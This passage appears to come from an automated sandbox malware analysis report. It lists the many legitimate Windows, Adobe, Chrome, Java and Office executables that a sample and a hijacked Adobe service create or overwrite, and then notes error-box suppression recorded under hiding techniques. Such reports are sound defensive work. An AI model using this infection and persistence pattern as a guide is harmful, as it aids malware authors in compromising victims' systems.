            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\Install\{AB28DC01-2BE1-4DAE-B39D-56281F166EE0}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
